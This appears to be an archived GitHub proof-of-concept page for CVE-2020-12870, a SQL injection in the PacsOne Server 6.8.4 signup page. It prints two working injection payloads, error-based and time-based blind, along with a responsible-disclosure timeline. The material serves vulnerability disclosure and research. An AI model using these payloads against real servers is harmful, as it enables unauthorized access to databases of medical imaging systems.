Skip to content
This repository has been archived by the owner on Dec 18, 2022. It is now read-only.
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
cve-pocs/CVE-2020-12870/
cve-pocs/CVE-2020-12870/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

Vulnerability

PacsOne Server 6.8.4 suffers from a SQL injection vulnerability on username parameter in the signup page.

Exploit

Allows attacker access to usersignup table in the database for pacs server

Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: hostname=localhost&database=PACS&username=asdf'||(SELECT 0x7a6d7355 WHERE 7540=7540 AND (SELECT 2789 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(2789=2789,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdf&firstname=asdf&lastname=asfd&email=asfd@foo.bar&action=Sign Up

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hostname=localhost&database=PACS&username=asdf'||(SELECT 0x7961476e WHERE 9154=9154 AND (SELECT 7374 FROM (SELECT(SLEEP(5)))nQhL))||'&password=asdf&firstname=asdf&lastname=asfd&email=asfd@foo.bar&action=Sign Up


alt text
alt text

Timeline

05-07-20: Submitted incident through email, immediate response
05-21-20: Issue resolved
09-10-20: New version released
09-19-20: Submitted public disclosure

Reference

MITRE CVE-2020-12870

Disclaimer

Content is for educational and research purposes only. Author doesn’t hold any responsibility over the misuse of the software, exploits or security findings contained herein and does not condone them whatsoever.